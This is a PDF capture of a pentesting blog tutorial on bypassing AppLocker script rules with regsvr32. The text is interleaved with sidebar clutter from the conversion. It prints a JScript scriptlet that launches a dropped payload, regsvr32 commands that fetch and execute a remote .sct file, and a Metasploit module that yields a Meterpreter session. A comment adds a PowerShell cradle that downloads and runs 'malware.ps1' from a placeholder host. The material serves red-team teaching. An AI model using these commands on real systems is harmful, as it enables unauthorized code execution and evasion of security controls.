Penetration Testing Lab

Articles from the Pentesting Field

Home Pentesting Distros Resources Submissions Toolkit Contact the Lab

AppLocker Bypass – InstallUtil Search the Lab

Search...
AppLocker Bypass – Regasm and Regsvcs

Author
May 11, AppLocker Bypass – Regsvr32
2017
netbiosX Defense Evasion AppLocker, Bypass, Metasploit, Regsvr32, Script
Rules 5 Comments
netbiosX

AppLocker was designed to allow administrators to block the execution of Windows

installer files, executables and scripts by users. However various techniques have been Follow PenTest Lab
discovered that can bypass these restrictions. For example in windows environments that
are configured to prevent the execution of scripts via AppLocker the regsrv32 command Enter your email address to follow this blog and
line utility can be used as a bypass method. receive notifications of new posts by email.

Join 1,666 other followers

Enter your email address

Follow

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Recent Posts
SPN Discovery
Situational Awareness
Lateral Movement – WinRM
AppLocker Bypass – CMSTP
PDF – NTLM Hashes

Categories
Coding (10)
Defense Evasion (20)

AppLocker – Script Rules Exploitation Techniques (19)

External Submissions (3)
The regsvr32 is a windows command line utility that is used to register and unregister .dll General Lab Notes (21)
files and ActiveX controls into the registry. Casey Smith discovered that it is possible to Information Gathering (12)
bypass AppLocker script rules by calling the regsrv32 utility to execute a command or Infrastructure (2)
arbitrary code through .sct files. This utility has many benefits since it is a trusted Microsoft
Maintaining Access (4)
binary, proxy aware, it supports TLS encryption, it follows redirects and it doesn’t leave any
Mobile Pentesting (7)
trace on the disk.
Network Mapping (1)
The scriptlet below is a modified version of the code that Casey Smith wrote but instead of Post Exploitation (12)
calling calc.exe or cmd.exe it will execute a custom binary that is already dropped on the Privilege Escalation (14)
target system if command prompt is allowed:
Red Team (26)
1 <?XML version="1.0"?> Social Engineering (11)
2 <scriptlet>
3 <registration         Tools (7)
4 progid="Pentest"        VoIP (4)
5 classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
6 <script language="JScript"> Web Application (14)
7   Wireless (2)
8 <![CDATA[  
9 var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\
10 ]]>
11   Archives
12 </script>

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 13 </registration> June 2018
14 </scriptlet>
May 2018
April 2018
The regsvr32 utility can be used to request and execute the script from the webserver that
January 2018
is hosted:
December 2017
1 regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll November 2017
October 2017
September 2017
August 2017
July 2017
June 2017
May 2017
Regsvr32 – Request and Execution of the Scriptlet April 2017
March 2017
These options are instructing the regsrv32 to run: February 2017
January 2017
Silently without displaying any messages // /s
November 2016
To not call the DLL Register Server // /n
September 2016
To use another IP address since it will not call the DLL Register Server // /i February 2015
To use the unregister method // /u January 2015
July 2014

It is also possible to use regsvr32 to run a locally stored payload as well. April 2014
June 2013
1 regsvr32 /u /n /s /i:payload.sct scrobj.dll
May 2013
The command will execute the scriptlet directly from the web server that is hosting the file. April 2013
The JavaScript code that is embedded in the .sct file instructs the pentestlab3.exe binary
March 2013
to be executed from the command prompt.
February 2013
January 2013
December 2012
November 2012
October 2012

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 September 2012
August 2012
July 2012
June 2012
April 2012
March 2012
February 2012

@ Twitter
AppLocker Bypass via Regsvr32 @L_AGalloway Sounds right! Easy to remember as
well! 20 hours ago
Since the pentestlab3 is a Metasploit payload a Meterpreter session will be opened: @0x09AL @BSidesAth ah! You could be a speaker
easily in any conf! 1 day ago
@0x09AL @BSidesAth Congrats! They are lucky to
have you! 1 day ago
[New Post] SPN Discovery
pentestlab.blog/2018/06/04/spn… #pentestlab
#redteam 1 day ago
CHIPSEC: Platform Security Assessment
Framework for analyzing the security of PC
platforms including hardware, syst…
Regsvr32 – Meterpreter
twitter.com/i/web/status/1… 2 days ago

Of course execution of scripts directly is still blocked however via the regsvr32 utility as per Follow @netbiosX
the example above this is possible.

Pen Test Lab Stats

3,025,980 hits

Blogroll

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Packetstorm Exploits,Advisories,Tools,Whitepapers
0
Metasploit Latest news about Metasploit Framework
and tutorials 0
0x191unauthorized Tutorials 0
The home of WeBaCoo Information about the
WeBaCoo and other tutorials 0
Command Line Kung Fu Command Line Tips and
Tricks 0

Exploit Databases
AppLocker – Restriction of Script Execution Exploit Database Exploits,PoC,Shellcodes,Papers
0
Metasploit Database Exploit & Auxiliary Modules 0
Metasploit
Inj3ct0r Database Remote,Local,Web
Metasploit Framework has a specific payload which can be used to bypass AppLocker via Apps,Shellcode,PoC 0
the Regsvr32 utility automatically.

1 exploit/windows/misc/regsvr32_applocker_bypass_server
Pentest Blogs
The module will start a webserver which will host a malicious .sct file. It will also provide
the command that needs to be executed on the target system. Carnal0wnage Ethical Hacking Tutorials 0
Coresec Pentest tutorials,Code,Tools 0
Notsosecure From Pentesters To Pentesters 0
Pentestmonkey Cheatsheets,Tools and SQL
Injection 0
Pentester Web Application Testing,Tips,Testing
Tools 0
Packetstorm Exploit Files 0
room362 Blatherings of a Security Addict 0
darkoperator Shell is only the Beginning 0
Metasploit – Regsvr32 Module
Irongeek Hacking Videos,Infosec Articles,Scripts 0

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 From the moment that the command will be executed the regsvr32 will request the .sct file Professional
from the web server and will execute a PowerShell payload.
The Official Social Engineering Portal Information
about the Social Engineering Framework,Podcasts
and Resources 0

Next Conference

Security B-Sides London

April 29th, 2014

The big day is here.

Metasploit – Execution of the Payload

As a result a Meterpreter session will be opened bypassing the AppLocker restrictions.

Facebook Page

Penetrati…
9.9K likes

Metasploit – AppLocker Bypass via Regsvr32 Like Page

Be the first of your friends to

Resources like this
https://www.rapid7.com/db/modules/exploit/windows/misc/regsvr32_applocker_bypass_serv

http://subt0x10.blogspot.co.uk/2017/04/bypass-application-whitelisting-script.html

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Advertisements Advertisements

Rate this:

Rate This

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Share this:

 Twitter  Facebook 22  LinkedIn  Pinterest

 Reddit  Tumblr  Google

Like
Be the first to like this.

Related

AppLocker Bypass - AppLocker Bypass - AppLocker Bypass -

InstallUtil CMSTP Rundll32
In "Defense Evasion" In "Defense Evasion" In "Defense Evasion"

5 Comments (+add yours?)

atropineal
May 18, 2017 @ 21:12:55

to my understanding this bypasses restrictions on the execution of javscript, not on the

execution of a binary. if you configure applocker with the default rules you will not be able
to execute pentestlab.exe, with or without regsrv32

REPLY

netbiosX
May 19, 2017 @ 08:16:44

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 It is indeed bypasses script rules restrictions. However don’t forget that this method
can allow you to run an executable that is hosted in a URL that you control so there
is no need for the binary to be dropped on the disk. Another scenario will be the
payload.sct file to actually call PowerShell and run scripts from memory:
powershell.exe -ep Bypass -nop -noexit -c iex ((New
ObjectNet.WebClient).DownloadString(‘https://[website]/malware.ps1′))
There are plenty of possibilities.

REPLY

atropineal
May 19, 2017 @ 09:26:40

hey! thanks for the response. if we can execute powershell anyway

(and regsvr32 will not help us to run it if it is blocked), then we can
already run the powershell web delivery command you mention directly.

regsvr32 does seem great in that we can download and execute a

remote vbscript that can inject and execute arbitrary shellcode into its
own process, and this seems great even if there is no requirement to
bypass whitelisting!

i haven’t seen a way to download and execute an actual exe file without
it touching disk though, which you seem to be referring to. if you know of
such a mechanism i’d be very pleased to hear about it!

playing with the regsrv32 applocker bypass – atropineal

May 19, 2017 @ 22:32:54

Command and Control – JavaScript | Penetration Testing Lab

Jan 08, 2018 @ 04:39:47

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Leave a Reply

Enter your comment here...

AppLocker Bypass – InstallUtil

AppLocker Bypass – Regasm and Regsvcs

Create a free website or blog at WordPress.com.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD